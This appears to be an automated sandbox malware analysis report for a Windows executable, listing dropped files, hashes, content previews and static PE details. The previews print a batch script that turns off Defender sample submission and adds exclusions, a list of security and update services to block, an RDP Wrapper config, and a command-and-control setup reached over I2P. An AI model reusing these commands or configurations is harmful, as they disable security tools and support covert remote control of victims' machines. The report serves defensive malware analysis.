SSDEEP:	6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
MD5:	261A842203ADB67547C83DE132C7A076
SHA1:	6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
SHA-256:	49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
SHA-512:	7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
Malicious:	true
Preview:	@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1

C:\Users\user\AppData\Local\Temp\wfpblk.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe
File Type:	Generic INItialization configuration [svc]
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.692426693515089
Encrypted:	false
SSDEEP:	3:PCLtupyhdA5A1XJy31ae0CYUAM9t2X0DwL1Uy/5ookVqEfokH2VmM74osLSgRUYp:PItZLJ4aZC9b/EhUyBjZBkWESqj
MD5:	E025B58CB2D118FAFAE00850EE91C5F9
SHA1:	DD23CE328F593AF74455F2C2F805B662466A1205
SHA-256:	897FC59CEDFBCAFDB9D0BEFEE9FC21A1B4C61259992A40F1986921E406E36340
SHA-512:	5CD3F72CB1FF5754F3329A1EF1C7D45826BE48540AAD60FC55B91C7EFDCBBEF8B6BEB66ED7E2CF338348CE3C43DE2C8B2C0E72C681A8C314ADBAE0F844C7B7EF
Malicious:	false
Preview:	[app]..MsMpEng.exe=1..MsSense.exe=1..SenseIR.exe=1..SenseNdr.exe=1..SenseCncProxy.exe=1..SenseSampleUploader.exe=1..[svc]..wuauserv=1..DoSvc=1..UsoSvc=1..WaaSMedicSvc=1..[ip4]..54.243.255.141=1..

C:\Users\user\AppData\Local\Temp\wfpblk.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	21487
Entropy (8bit):	5.069729499027424
Encrypted:	false
SSDEEP:	384:ubbEbNQ6s69WS8vv88o888888888888j888888888888e88888888088888888A4:ubbEbNQ6s69WS8vv88o888888888888J
MD5:	D9295B7BE0DAF6EA62B8603BC4415FD6
SHA1:	AC44C082D9349177D1E1D4DEF4D5901A99547D91
SHA-256:	F4B9A62A7288AB1436977C58A8CB7A550EAD84DF8DCE2591FCB87C2DDF59F7B4
SHA-512:	7C76DFB991C172557A6F4559F194276263CEFA6BF838FFA12E27BC67A7B59345CF956552A89F040465EDB009E89E6E84C4BD4A0FF6A39BDE9431B0C5887E77FB
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\wfpblk.log)..[I] (debug_init) -> Done..[I] (fs_file_write) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,mode=wb,buf_sz=195)..[I] (fs_file_read) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,buf_sz=195)..[I] (ini_load) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=[System Process],err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=System,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=Registry,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=smss.exe,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=csrss.exe,err=00000003)..[D] (ini_get_sec) -> Done

C:\Windows\Temp\9qaNW6z6

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.277217301921545
Encrypted:	false
SSDEEP:	1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
MD5:	D0F0423AEEE6B6FF6754D860603D46D0
SHA1:	A06F3B9605B3398BA68154DA39ADF26DDEE41743
SHA-256:	81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
SHA-512:	C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................

C:\Windows\Temp\DYoNFfUY

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	6.259370376612282
Encrypted:	false
SSDEEP:	1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
MD5:	7A8E8A0842D8D65713DEE5393E806755
SHA1:	AF6F3A52009FBF62C21A290EFC34A94C151B683E
SHA-256:	51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
SHA-512:	D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............\|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................

C:\Windows\Temp\HwfABz7s

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

C:\Windows\Temp\I1Td0enf

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	441513
Entropy (8bit):	5.449545529389614
Encrypted:	false
SSDEEP:	768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
MD5:	5FCB4B6362E04A8D1C6ECD33AD246FB9
SHA1:	E198D3E81C4B8527451133BCEAFA799D2115A8BB
SHA-256:	060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
SHA-512:	B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\Windows\Temp\Jcf8nu5c

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	129024
Entropy (8bit):	6.313152038164236
Encrypted:	false
SSDEEP:	3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
MD5:	C89542ABA45CE1084760AE8DE6EAE09E
SHA1:	603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
SHA-256:	1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
SHA-512:	60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................

C:\Windows\Temp\TLN3Eh0f

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	105984
Entropy (8bit):	6.2884725801282775
Encrypted:	false
SSDEEP:	1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
MD5:	91A0DD29773FBFB7112C5FCFF1873C13
SHA1:	E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
SHA-256:	AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
SHA-512:	F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................

C:\Windows\Temp\TU7a866y

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [cnccli]
Category:	dropped
Size (bytes):	214
Entropy (8bit):	5.0997449470012635
Encrypted:	false
SSDEEP:	6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
MD5:	26702FAAB91B6B144715714A96728F39
SHA1:	CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
SHA-256:	83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
SHA-512:	50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
Malicious:	false
Preview:	[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..

C:\Windows\Temp\j8fz8FfX

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	92672
Entropy (8bit):	6.242846530333761
Encrypted:	false
SSDEEP:	1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
MD5:	FDCF93ACD089B505B524DDFA0FF947F9
SHA1:	A2BADA5807BA001758DBCE46DA634332A5CC14C2
SHA-256:	ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
SHA-512:	110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................

C:\Windows\Temp\kInii6kX

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.2290767543196575
Encrypted:	false
SSDEEP:	1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
MD5:	4C086C8F48C4D0F8C20410E60340AEC9
SHA1:	77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
SHA-256:	0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
SHA-512:	CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................

C:\Windows\Temp\vjj4eCBz

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8568
Entropy (8bit):	4.958673415285098
Encrypted:	false
SSDEEP:	96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
MD5:	27535CEE6740DFC50A78A0322415E67C
SHA1:	E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
SHA-256:	FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
SHA-512:	25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
Malicious:	false
Preview:	## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf

C:\Windows\Temp\vtuO6KSc

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	62449
Entropy (8bit):	7.807149241969407
Encrypted:	false
SSDEEP:	1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
MD5:	688FDFAE15F328A84E8F19F8F4193AF2
SHA1:	C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
SHA-256:	8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
SHA-512:	F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
Malicious:	false
Preview:	I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.ZT.v...C..~m.....r.u.._..0._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...

C:\Windows\Temp\zCUeqzwC

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9146880
Entropy (8bit):	6.674868432808522
Encrypted:	false
SSDEEP:	196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
MD5:	676064A5CC4729E609539F9C9BD9D427
SHA1:	F77BA3D5B6610B345BFD4388956C853B99C9EB60
SHA-256:	77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
SHA-512:	4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

C:\Windows\Temp\zFE1sfMY

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115200
Entropy (8bit):	6.220212606349767
Encrypted:	false
SSDEEP:	1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
MD5:	BE6174AE2B452DA9D00F9C7C4D8A675B
SHA1:	0ABD2C76C82416AE9C30124C43802E2E49C8ED28
SHA-256:	A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
SHA-512:	5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.081768116226836
TrID:	Win64 Executable GUI (202006/5) 92.64% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% VXD Driver (31/22) 0.01%
File name:	file.exe
File size:	11'950'592 bytes
MD5:	54a1448df6e33d7032232dd1d896bc68
SHA1:	8ed1df1c308956143e79adf5732e2d6204faf58a
SHA256:	075d0dafd7b794fbabaf53d38895cfd7cffed4a3fe093b0fc7853f3b3ce642a4
SHA512:	918f0e7252ab5f6b1b576060c67ecaa185e4616ed88bf02e04c578559179897876f4c6b1b413c727189ea53846accfc966a25f75e0b20400fb1c1c0db30127d6
SSDEEP:	98304:FdwqvpPlIpF6+2UT0lursS0lU7h6bBZdQI:PwqhPlIp12C0luoU7h
TLSH:	1FC65B7F76A18629C22EC23AC0A38F04E93370BD1733C6E793A45169DF599D45E3E624
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................

File Icon


Icon Hash:	1f6c6cececf16117

Static PE Info

General

Entrypoint:	0xcb1f90
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:
Time Stamp:	0x66F18B15 [Mon Sep 23 15:36:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	266fe50b75556d32a77ba4347fd8a6b3

Entrypoint Preview

Instruction
push ebp
dec eax
sub esp, 20h
dec eax
mov ebp, esp
nop
dec eax
lea ecx, dword ptr [FFFE9B08h]
call 00007FB5485CD330h
dec eax
mov eax, dword ptr [000BB09Ch]
dec eax
mov ecx, dword ptr [eax]
call 00007FB54888B381h
dec eax
mov eax, dword ptr [000BB08Dh]
dec eax
mov ecx, dword ptr [eax]
mov dl, 01h
call 00007FB54888E030h
dec eax
mov eax, dword ptr [000BB07Ch]
dec eax
mov ecx, dword ptr [eax]
dec eax
mov edx, dword ptr [FFFE939Ah]
dec esp
mov eax, dword ptr [000BB77Bh]
call 00007FB54888B383h
dec eax
mov eax, dword ptr [000BB05Fh]
dec eax
mov ecx, dword ptr [eax]
call 00007FB54888B594h
call 00007FB5485C4D5Fh
jmp 00007FB548E671BAh
nop
nop
call 00007FB5485C4F56h
nop
dec eax
lea esp, dword ptr [ebp+20h]
pop ebp
ret
dec eax
nop
dec eax
lea eax, dword ptr [00000000h+eax]
dec eax
sub esp, 28h
call 00007FB5485C44ECh
dec eax
add esp, 28h
ret
int3
int3
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x99e000	0x9d	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x98e000	0x50c6	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa8d000	0x100200	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xa1c000	0x70b30	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a1000	0x7a060	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x9a0000	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x98f500	0x1320	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x994000	0x914c	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b1020	0x8b1200	375a7695d7a014dcd497198eb48daff1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x8b3000	0xbab68	0xbac00	8576115677fae01541a8758828a6f879	False	0.2308975485274431	data	4.9676295748628565	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x96e000	0x1f0cc	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x98e000	0x50c6	0x5200	a8f85f9f35e1c8e857717f7fdcac1451	False	0.24471227134146342	data	4.360232251720157	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
